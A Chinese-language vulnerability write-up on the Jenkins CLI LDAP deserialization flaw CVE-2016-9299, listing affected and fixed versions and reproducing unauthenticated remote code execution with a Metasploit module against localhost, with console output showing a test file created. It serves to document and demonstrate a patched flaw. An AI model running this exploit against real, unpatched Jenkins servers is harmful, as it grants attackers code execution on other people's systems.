Jenkins CLI Ldap Deser CVE-2016-9299

1024px-Jenkins_logo_with_title.svg_meitu_1.jpg

漏洞名称

Unauthenticatedremote code execution vulnerability in Jenkins

影响版本

  • LTSRelease 2.19.3 之前的所有版本
  • WeeklyRelease 2.32 之前的所有版本

修复版本

  • mainline 2.32
  • LTS2.19.3

漏洞危害

远程代码执行

Exploit

https://github.com/rapid7/metasploit-framework/pull/7815

漏洞复现

b2ae6b6e-eec0-11e6-9657-bebfbfb80609.png


    msf > use exploit/linux/misc/jenkins_ldap_deserialize
    msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
    PAYLOAD => cmd/unix/generic
    msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
    CMD => touch /tmp/wtf
    msf exploit(jenkins_ldap_deserialize) > run
    [*] Exploit completed, but no session was created.

c6ac0df6-eec0-11e6-8c9a-ab1cae579c8f.png

成功

e132e262-eec0-11e6-9335-956b69391ba4.png

[~] ls /tmp/wtf
/tmp/wtf

参考

标签: Jenkins, CVE-2016-9299

添加新评论